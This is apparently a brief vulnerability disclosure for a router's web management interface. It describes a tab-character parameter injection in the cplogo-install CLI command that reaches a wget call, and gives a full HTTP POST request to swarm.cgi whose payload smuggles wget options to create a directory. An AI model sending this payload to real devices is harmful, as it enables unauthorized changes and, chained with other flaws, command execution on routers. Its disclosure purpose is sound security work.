An authenticated attacker can create a directory at arbitrary path. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.
An attacker can chain this with other vulnerabilities to run arbitrary commands on the router.
POST /swarm.cgi HTTP/1.1 Host: IP:4343 ....... ....... Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"https:// IP:4343/backup.cfg%09--directory-prefix%09/tmp/oper_/%09#"'&refresh=false&sid=XXXXXXXXXXXXXXXXXXXX&nocache=0.23759201691110987&=&=